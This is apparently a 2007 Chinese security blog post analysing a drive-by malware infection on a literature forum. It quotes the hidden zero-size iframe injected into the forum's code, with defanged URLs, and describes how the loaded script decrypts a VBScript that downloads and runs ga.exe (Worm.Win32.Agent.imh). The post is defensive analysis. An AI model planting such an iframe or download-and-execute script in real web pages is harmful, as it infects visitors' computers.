本文分析了一个文学论坛被植入的恶意软件Worm.Win32.Agent.imh,详细介绍了该恶意软件的传播方式及清除方法。通过分析论坛代码,发现了恶意软件的来源及执行流程。
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
endurer原创
2007-08-22第1版
上回妯现挂的是 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
刚才一不小心又进去了,卡巴没反应~
一位刚进去的网友说瑞星发现、并清除了三个 Worm.Win32.Agent.imh,都在IE缓存里,文件名是 ga[1].exe之类。
检查论坛代码,发现:
/---
<iframe src="hxxp://www.yo*y*o5**9.com/m*68.htm?id=907" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.yo*y*o5**9.com/m*68.htm?id=907 包含脚本代码,功能是使用自定义算法解密并输出变量 S 的值。
解密后的变量 S 的值 为 VBScript 脚本,功能是下载 hxxp://x***xt*vb.cn/arp/ga.exe 并运行。
不过我这无法下载 ga.exe,难怪卡巴没反应。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
